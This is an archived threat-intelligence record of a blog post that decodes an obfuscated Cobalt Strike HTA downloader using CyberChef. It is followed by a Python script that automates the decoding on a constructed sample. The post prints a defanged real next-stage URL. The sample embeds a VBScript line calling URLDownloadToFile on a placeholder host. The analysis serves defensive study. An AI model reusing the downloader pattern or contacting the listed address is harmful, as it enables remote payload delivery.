{
	"id": "be77674c-604f-4428-9281-8a74e33bc61b",
	"created_at": "2026-04-06T00:07:31.823059Z",
	"updated_at": "2026-04-10T03:24:23.67226Z",
	"deleted_at": null,
	"sha1_hash": "b732832eef76b4c9db4b21a447d087d5db780b81",
	"title": "Decoding a Cobalt Strike Downloader Script With CyberChef",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2565499,
	"plain_text": "Decoding a Cobalt Strike Downloader Script With CyberChef\r\nBy Matthew\r\nPublished: 2024-08-04 · Archived: 2026-04-05 19:41:11 UTC\r\nIntroduction\r\nWe recently encountered a short .HTA script on Malware Bazaar that was linked to the Cobalt Strike toolkit.\r\nThe script utilises basic obfuscation that can be removed using CyberChef and a text editor. This blog will cover our decoding process, including how to decode the following obfuscation methods:\r\nBase64\r\nURL Encoding\r\nExcessive Spacing\r\nOriginal File\r\nThe file used for this analysis can be found on Malware Bazaar under the following SHA256 hash.\r\n2807199adde4730e5e89c5f0ed3d48380dac746a44fa1e5fe0ca0186743a97e0\r\nAnalysis\r\nThe .HTA file in its initial state contains a small amount of HTML followed by a large batch of URL encoded characters.\r\nThe first step to decoding the URL encoded content is to use a tool like CyberChef and the URL Decode operation.\r\nAs can be seen below, this decodes the content but reveals another layer of URL encoding.\r\nhttps://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/\r\nPage 1 of 5\r\nThe second layer of URL encoding can be resolved with another URL Decode operation.\r\nApplying the operation again removes the last of the URL encoding.\r\nThe content can now be moved back to a text editor for additional analysis.\r\nAlthough the URL encoding has been removed, the script still employs blobs of spaces to hinder analysis. This can be seen in the screenshot below.\r\nThe spacing can be removed manually by highlighting and deleting, but a more efficient means is to use a regular expression to match occurrences of two or more whitespace characters (\\s).\r\nBy performing a search and replace with the \\s\\s+ query, we can see the excessive spacing is highlighted and matched correctly.\r\nBy specifying a replace value of a single space, the content can be cleaned up significantly. Note that \\s also matches line breaks, so the cleaned script is intended for reading rather than for execution.\r\nThe script content can now fit easily into a single screenshot.\r\nA large blob of base64 content can be seen in the resulting content, alongside the key giveaway of FromBase64String written with randomised upper and lower casing.\r\nThe base64 blob can be copied and decoded in CyberChef using From Base64.\r\nThe resulting content contains more excessive spacing. The same regular expression technique as before can be re-applied to fix this.\r\nBelow we can see the From Base64 operation and the removal of excessive spacing via regex.\r\nAfter the spacing is removed, it becomes clear that the code is a downloader utilising the URLDownloadToFile function.\r\nThe address of the next stage file is also clearly visible, and contains the value\r\nhttp://198.46[.]178.144/morningfiledatinglover[.]vbs\r\nSource: https://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/"
	],
	"report_names": [
		"decoding-a-cobalt-strike-downloader-script-with-cyberchef"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434051,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b732832eef76b4c9db4b21a447d087d5db780b81.pdf",
		"text": "https://archive.orkl.eu/b732832eef76b4c9db4b21a447d087d5db780b81.txt",
		"img": "https://archive.orkl.eu/b732832eef76b4c9db4b21a447d087d5db780b81.jpg"
	}
}
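The decoding chain the archived post walks through (URL Decode until no layer remains, collapse runs of whitespace with `\s\s+`, From Base64 on the blob passed to a mixed-case `FromBase64String`, collapse whitespace again, then read off the `URLDownloadToFile` target) as one scripted pass. This is an added example, not the post's own code or a CyberChef recipe export; the HTA it decodes is constructed inside the script, the stage-2 text is illustrative rather than the real file's content, and `example.invalid` is a placeholder hostname.

```python
"""Layered deobfuscation of an HTA downloader, mirroring the manual CyberChef steps:
URL Decode (repeated) -> collapse spacing -> From Base64 -> collapse spacing -> pull URLs.
Added example; the sample input below is constructed, not the Malware Bazaar file."""
import base64
import re
import urllib.parse

MAX_URL_LAYERS = 5  # guard against a pathological input that never stabilises


def url_decode_all(data: str, max_layers: int = MAX_URL_LAYERS) -> tuple[str, int]:
    """Apply URL decoding until the text stops changing (the post needed two passes).
    Returns (decoded_text, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        decoded = urllib.parse.unquote(data)
        if decoded == data:
            break
        data = decoded
        layers += 1
    return data, layers


def collapse_spacing(data: str) -> str:
    # Same search-and-replace as the post: \s\s+ -> single space.
    # \s also eats line breaks, so the result is for reading, not re-execution.
    return re.sub(r"\s\s+", " ", data)


# Match FromBase64String in any casing and capture the literal it is given.
B64_CALL = re.compile(r"frombase64string\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.IGNORECASE)


def extract_base64_blobs(data: str) -> list[str]:
    """Base64 literals passed to FromBase64String, whatever casing the author used."""
    return B64_CALL.findall(data)


def decode_blob(blob: str) -> str:
    raw = base64.b64decode(blob, validate=True)  # reject non-base64 bytes early
    return raw.decode("utf-8", errors="replace")


def find_download_urls(data: str) -> list[str]:
    """http(s) URLs in the decoded stage, e.g. the URLDownloadToFile target."""
    return re.findall(r"https?://[^\s'\"<>)]+", data)


def deobfuscate(hta: str) -> dict:
    text, layers = url_decode_all(hta)
    text = collapse_spacing(text)
    blobs = extract_base64_blobs(text)
    stages = [collapse_spacing(decode_blob(b)) for b in blobs]
    urls = [u for s in stages for u in find_download_urls(s)]
    return {"url_layers": layers, "cleaned": text, "stages": stages, "urls": urls}


# Constructed sample (hypothetical): a stage-2 snippet padded with whitespace,
# base64-encoded, dropped into an HTA wrapper that is itself padded, then
# URL-encoded twice, as the post describes. Hostname is a placeholder.
STAGE2 = ('Set o = CreateObject("Scripting.FileSystemObject")   \n\n'
          '   url = "http://example.invalid/stage2.vbs"        \n'
          'Call URLDownloadToFile(0, url, "C:\\Users\\Public\\s.vbs", 0, 0)   ')
_blob = base64.b64encode(STAGE2.encode()).decode()
_script = ('<html><head><script language="VBScript">     \n\n\n'
           '    x = [System.Convert]::FrOmBaSe64StRiNg("' + _blob + '")      \n'
           '</script></head></html>')
SAMPLE_HTA = urllib.parse.quote(urllib.parse.quote(_script, safe=""), safe="")

if __name__ == "__main__":
    result = deobfuscate(SAMPLE_HTA)
    print("URL-encoding layers removed:", result["url_layers"])
    print("Next-stage URLs:", result["urls"])
```

`url_decode_all` loops rather than assuming exactly two layers, because the only evidence for the layer count is that the text keeps changing; the cap stops a crafted input from spinning forever. On a real sample, replace `SAMPLE_HTA` with the file contents read as text and treat every URL that falls out as an indicator to defang before sharing.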